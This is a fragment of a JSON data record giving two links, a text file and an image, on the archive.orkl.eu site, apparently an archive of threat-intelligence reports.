		"text": "https://archive.orkl.eu/869364ef84d5105b33f8f2006e3d047998a7565e.txt",
		"img": "https://archive.orkl.eu/869364ef84d5105b33f8f2006e3d047998a7565e.jpg"
	}
}